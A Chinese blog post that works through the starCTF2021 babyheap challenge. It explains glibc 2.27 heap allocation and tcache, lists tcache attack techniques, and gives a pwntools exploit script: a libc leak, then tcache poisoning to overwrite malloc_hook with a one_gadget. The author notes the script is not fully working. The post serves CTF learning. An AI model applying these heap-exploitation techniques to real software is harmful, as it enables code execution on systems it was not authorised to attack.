从一道题中学习Glibc2.27堆管理机制

最新推荐文章于 2024-02-19 15:17:05 发布
最新推荐文章于 2024-02-19 15:17:05 发布
阅读量974 收藏 2
点赞数 1
分类专栏: 学习日记 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zoxiee/article/details/112910413
版权

众所周知,Glibc2.26以后增加了tcache机制,而比赛中通常会使用2.27版本的题目。于是这里从最近一道题目中总结一些Glibc的堆malloc和free时过程和保护机制。

starCTF2021 babyheap

题目在此下载
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
题目的add,delete,edit,show功能如上图。漏洞很明显,UAF漏洞,但是难点在于每个堆块的前八个字节都无法直接写,这意味着并不能简单的double free。这里就得利用堆管理机制。

Glibc2.27堆的malloc和free

tcache bins是一个长度为64的字节数组,每个字节数组对应一条链表。所以tcachebins只能存放0x0-0x400大小的堆,且每个链表长度为7,是一个单链表。在释放大小为0x0-0x400大小的堆的时候,首先会被释放入对应长度tcachebins对应的链表中,当长度超出7后,再放入fastbin或unsortbins中。

具体函数流程就不在此详细贴出,只做总结。malloc和free过程与2.23版本差别并不大,更详细内容可以点开reference康康。

malloc:

确定需要分配的内存size==》

tcachebin中寻找==》

fastbin中寻找(size小于0x80),如果有则分配,并把fastbins剩余chunk放入tcachebins直到存满==>

small bin中寻找(size小于0x400),如果有则分配,并把small bin剩余chunk放入tcachebins直到存满,如果smallbin为空调用 malloc_consolidate 来合并 fastbin chunk 到 smallbin 中==》

unsortedbin中寻找(size小于0x400),如果有则分配或者切割,把剩余chunk放到small bins和large bins;若)(size小于0x400)但unsortbin没有满足大小的,切割top chunk==》

size大于0x400时,将fastbins中相邻chunk的合并链接到unsorted bin ;遍历unsortbin,如果unsorted bins上只有一个chunk并且大于待分配的chunk则进行切割;若大小相等直接分配;小于0x400放回small bin;大于0x400放回large bin;若未分配则下一步==》

当将 unsorted bin 中的空闲 chunk 加入到相应的 small bins 和 large bins 后,将使用最佳匹配法分配chunk,找到合适的small bin chunk或者large bin chunk,然后切割该chunk,返回给用户,切割的剩余部作为一个新的 chunk 加入到 unsorted bin 中==》

上述bin都找不到,切割top chunk;若top chunk不够sbrk(main arena)或mmap(thread arena)扩容

2.27的_int_malloc和2.23的主要区别在于2.27会将fastbin和smallbin还有unsortedbin中多余的块放入tcache中。

free:

判断chunk是否在tcache范围且tcachebins未满,是则放入==》

判断chunk是否与top chunk相邻,是则合并==》

判断chunk大小大于0x80,是则放入unsortedbin,检查是否有合并,有则合并==》
判断chunk大小小于0x80,是则放入fastbin并不改变chunk状态==》

fastbin中,若该chunk下个chunk是空闲的,则会合并放回unsortedbin,并判断大小是否大于 FASTBIN_CONSOLIDATION_THRESHOLD,若是则对fastbin中chunk遍历合并并放回unsortedbin,此时fastbin为空==》

判断topchunk是否大于mmap收缩阙值,若是尝试归还top chunk中一部分给系统。

2.27的free与之前主要的区别在于先检查是否处于tcache范围,且tcache未存满,如果没有存满则直接put进去,之后的操作于2.23如出一辙。

漏洞

tcache poision:修改fd指针

tcache dup:即tcache double free

tcache perthread corruption

tcache house of spirit

smallbin unlink:利用free时机制

tcache stashing unlink#利用free时机制

house_of_bot_cake

reference:
ptmalloc与glibc的数据结构

2.27的malloc和free

_int_malloc源码分析

常见tcache attack

Glibc27 29 30 31

题目中的利用

程序中有个功能会malloc 0x400。

利用上述所说机制,先把0x50 tcache bin填满并且在fastbins中放入一个0x50 chunk(该chunk不可与top chunk相邻),此时malloc 0x400时,则会泄露libc基址。
在这里插入图片描述
再利用上述机制,malloc 0x30时,因为unsortedbin遍历完(本就就为空了),选择smallbins的那个chunk进行切割,并把剩余的部分放到unsortbin(如下),再申请一个0x10的chunk,即可用原来0x50的chunk控制这个0x10的chunk的next指针
在这里插入图片描述
后面利用tcach poisoning实现任意地址写,修改malloc_hook为one_gadget即可

exp如下(没通,好像偏移有点问题,但是malloc_hook确实被修改了,主要是想总结堆管理机制,没搞了)

from pwn import *
context.log_level= 'debug'
p = process('./pwn')
#p = process(['./pwn'],env={"LD_PRELOAD":"./libc.so.6"})
def add(index,size):
    p.recv()
    p.sendline('1')
    p.recv()
    p.sendline(str(index))
    p.recv()
    p.sendline(str(size))

def delete(index):
    p.recv()
    p.sendline('2')
    p.recv()
    p.sendline(str(index))

def show(index):
    p.recv()
    p.sendline('4')
    p.recv()
    p.sendline(str(index))

def edit(index,content):
    p.recv()
    p.sendline('3')
    p.recv()
    p.sendline(str(index))
    p.recv()
    p.sendline(content)

for i in range(9):
    add(i,0x50)
for i in range(7):
    delete(i)

delete(7)
p.recv()
p.sendline('5')
p.recv()
p.sendline('')
show(7)
leak = u64(p.recv(6).ljust(8,'\x00'))

libc_base = leak - 176 - 0x10 - 0x3ebc30#0x3EBC30
malloc_hook = libc_base + 0x3ebc30 - 0x8
one_gadget = libc_base + 0x4f365
add(0,0x30)
gdb.attach(p)
pause()
add(1,0x10)
delete(1)
payload = 'a'*0x28 +p64(0) +p64(0x21)+ p64(malloc_hook)
edit(7,payload)
add(2,0x10)
add(3,0x11)
edit(3,p64(one_gadget))
gdb.attach(p)
add(1,0x20)
p.interactive()
z0xi
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
glibc-2.27
08-04
C标准库 glibc-2.27.tar.tar
glibc2.27题绕过沙箱
qq_45595732的博客
03-27 634
这里因为重点在于沙箱的绕过,漏洞就拿了一个最简单的uaf做演示。 最主要的是setcontext这个函数,可以看到setcontext+53之后控制了大量的寄存器(可以看作就是一个SigreturnFrame),寻址都是[rdi+x]的方式,那么我们假如劫持了free_hook为setcontext+53,此时rdi刚好是块内容的地址,我们可以直接放个SigreturnFrame进去,之后利用的话就按个人喜好了。我写了三种方式,本质都是orw。 1.mprotect+shellcode 2.rop(rop
glibc-core-2.27
11-21
系统升级包,用与linux centos glibc底层医院库升级。。
glibc-2.27.tar.gz
07-22
glibc2.27的源码,如果想要研究块的,可以看本文的博客:https://blog.csdn.net/qq_41453285/category_9150569.html
glibc2-27.tar
06-03
https://blog.csdn.net/u012534831/article/details/106526498 麒麟系统上运行自己的软件时可能碰到错误, /usr/lib64/libc.so.6: version `GLIBC_2.27' not found (required by /.../libxxx.so) ,已经编译好的lib
官网-linux-glibc-2.27.zip
12-31
Linux下的C函数库,libc是Linux下的ANSI C的函数库,本人是为了解决 unable to open file not found fie:///build/glibc-OTsEL5/glibc-2.27/....的问题下载的. zip包内的tar包放在linux系统/build/glibc-OTsEL5下,解压...
glibc-2.27-19.fc28.aarch64.rpm
07-27
glibc是linux系统中最底层的api,几乎其它任何运行库都会依赖于glibcglibc除了封装linux操作系统所提供的系统服务外,它本身也提供了许多其它一些必要功能服务的实现。由于 glibc 囊括了几乎所有的 UNIX 通行的...
glibc内存管理流程图梳理
10-26
glibc内存管理流程图梳理
升级glibc2.27
kobe24fgy的博客
08-03 6758
将安装包上传至/home目录 1、解压 tar -zxvf glibc-2.27.tar.gz cd glibc-2.27 mkdir glibc227 cd glibc227 2、编译安装 export LD_LIBRARY_PATH=/usr/local/mpc-1.0.3/lib:/usr/local/gmp-6.1.2/lib:/usr/local/mpfr-3.1.5/lib:/usr/local/gcc-9.3.0/lib:/usr/local/isl-0.18/lib:/ /home/gc
glibc-2.27-how2heap学习
qq_40712959的博客
03-26 760
学习参考how2heap,主要用于理解不同版本glibc机制 fastbin_dup #include <stdio.h> #include <stdlib.h> #include <assert.h> int main() { setbuf(stdout, NULL); printf("This file demonstrates a simple double-free attack with fastbins.\n"); printf("Fill up
Linux 开发环境 -- glibc 升级(不建议轻易升级)
There is an octopus in the fish pond
08-05 3425
由于项目需要, 在编译过程中遇到需要将glibc进行升级的编译错误。 于是乎, 各种baidu、google。查找升级教程。 经过了一番操作, 于是升级了。但是系统再也回不去了。 记录以此教训,同时给广大同胞一个提醒。 由于条件不允许, 只能进行源码编译进行升级。 以下流程几乎适用于所有软件包更新, 且方式为源码编译更新 下载 进入网站选择了版本2.27进行下载。完事之后, 解压到目录中glibc-2.27目录 创建编译目录 进入目录glibc-2.27新建目录build mkdir build 然后进入
node.js出现version `GLIBC_2.27‘ not found的解决方案
热门推荐
weixin_43178406的博客
12-03 3万+
 本文主要介绍了node.js出现version `GLIBC_2.27’ not found的解决方案,希望能对使用node的同学们有所帮助。 文章目录 1. 问题描述 2. 解决方案
【逆向学习记录】Tcachebin CISCN_2019_PWN17 Write up
卦星的专栏
09-01 989
1 概述 这几天做了一个libc2.27的题目,了解到tcachebin的基础内容,发现利用这个tcachebin,反而导致漏洞更好利用了 2 tchchebin 3 CTF题目 题目1:CISCN2019_pwn6 参考:pwn6_exp 题目2:CISCN2019_pwn17 4 解题思路 4.1 题目解析 1,输入内容,基本上没有任何内容提示 2、反编译查看 1、存在一个check,绕过这...
离线的Ubuntu18.04升级GLIBC2.27——解决报错:/lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.28‘ not found
最新发布
weixin_39379635的博客
02-19 1383
解决报错:/lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.28‘ not found
centos7升级gcc&glibc(踩坑)
yutenys的博客
12-26 1万+
公司新到的服务器,需要安装常用的数据库,在mysql,postgresql等安装的时候都非常的顺利,但是在安装SqlServer的时候发现缺少依赖的glibc2.18和glibc2.27,于是便有了这次的踩坑之旅。 刚开始是看缺什么就装什么,先下载了glibc2.18和glibc2.27,2.18版本的安装很顺利,但是在2.27安装的时候就开始报错了(最后发现是缺少一个libc-2.27.so的文件,但是一部分文件已经变成了2.27版本,一部分还是2.18的,导致版本不一致,环境就出问题了),然后各种百度
tcache attack
yeshen4328的专栏
11-01 180
tcache attack tcache double free double free可以通过对同一块内存free两次,实现任意地址写。当libc版本在2.26以上时,free的块优先放入tcache,malloc也优先从tcache中取,性能更好。但是安全检查变弱了。 static void tcache_put (mchunkptr chunk, size_t tc_idx) { tcache_entry *e = (tcache_entry *) chunk2mem (chunk); ass
how2heap glibc 2.27
qq_46441427的博客
10-10 458
fastbin dup 展示了glibc2.27里利用double free进行的fastbin attack #include <stdio.h> #include <stdlib.h> #include <assert.h> int main() { setbuf(stdout, NULL); printf("This file demonstrates a simple double-free attack with fastbins.\n"); pri
2021 长城杯 pwn K1ng_in_h3Ap_II
yongbaoii的博客
09-24 219
保护全开 libc是2.27的。 开了沙箱 add 最多16个,大小最大0x60 free 显然是有个uaf edit edit就是正常输入 show 正常输出。 所以其实就是一个2.27srop。 第一步是把因为开沙箱申请然后释放的chunk都从各种链中都拉走。 for i in range(8): allocate(0, 0x10) allocate(0, 0x40) for i in range(7): allocate(0, 0x60) 第二步泄露一下heap的地址。 al
opencv-c++ error:libopencv_imgproc.so.4.1: undefined reference to expf@GLIBC_2.27
DAOCHI
03-06 871
Ubuntu18下编译的 opencv-4.1,Ubuntu16下工程引用编译好的 opencv 库,出现如下错误
Linux下安装GLIBC2.27
11-30
为了在Linux下安装GLIBC2.27,可以按照以下步骤进行操作: 1. 下载GLIBC2.27的源代码包,可以从官方网站上下载,例如:... 安装完成后,GLIBC2.27就已经成功安装到了系统中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值